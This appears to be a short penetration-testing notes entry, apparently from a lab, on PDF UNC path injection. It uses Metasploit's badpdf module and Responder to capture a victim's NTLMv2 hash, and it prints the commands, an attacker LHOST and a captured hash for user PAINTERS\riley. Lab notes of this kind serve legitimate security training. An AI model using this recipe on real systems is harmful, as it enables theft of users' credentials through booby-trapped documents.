.pdf UNC path injection
Used to potentially grab NTLM
Metasploit offers a module for this:
msf6 > use auxiliary/fileformat/badpdf
msf6 auxiliary(fileformat/badpdf) > options
msf6 auxiliary(fileformat/badpdf) > set FILENAME pwn
msf6 auxiliary(fileformat/badpdf) > set LHOST 10.10.14.15
LHOST => 10.10.14.15
msf6 auxiliary(fileformat/badpdf) > set FILENAME pwn.pdf
FILENAME => pwn.pdf
msf6 auxiliary(fileformat/badpdf) > exploit
[+] pwn.pdf stored at /home/kali/.msf4/local/pwn.pdf
[*] Auxiliary module execution completedRun responder to host SMB server and send .pdf file to victim:
sudo responder -I tun0
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.110.35
[SMB] NTLMv2-SSP Username : PAINTERS\riley
[SMB] NTLMv2-SSP Hash : riley::PAINTERS:060d714a7844b974:A484817A0CD2C62B7DF8A86B2CD6DB05:010100000000000000D005934859DA018900397E547C1756000000000200080034004B004200450001001E00570049004E002D004F00530048005800420052003100450055003000380004003400570049004E002D004F0053004800580042005200310045005500300038002E0034004B00420045002E004C004F00430041004C000300140034004B00420045002E004C004F00430041004C000500140034004B00420045002E004C004F00430041004C000700080000D005934859DA0106000400020000000800300030000000000000000000000000200000581B6AB3446025399B1A16051E02903D3569247B42030BE93FCE01F056E48FDD0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00310035000000000000000000Last updated